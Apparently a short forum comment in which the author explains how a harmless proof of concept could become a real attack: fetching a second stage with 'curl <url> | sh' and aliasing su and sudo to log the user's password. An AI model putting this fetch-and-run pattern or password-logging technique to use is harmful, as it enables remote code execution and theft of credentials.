|
|
|
|
|
|
by TheJH_
4819 days ago
|
|
|
Well, if I had really wanted to build a serious attack instead of a harmless PoC, I'd have downloaded a second stage via `curl <url> | sh`, and that script would, for example, set aliases in your shell for `su` and `sudo` that call the real commands but log your password in the background. Unless you're using requiretty, of course, but I don't assume that you're using a real tty. |
|
|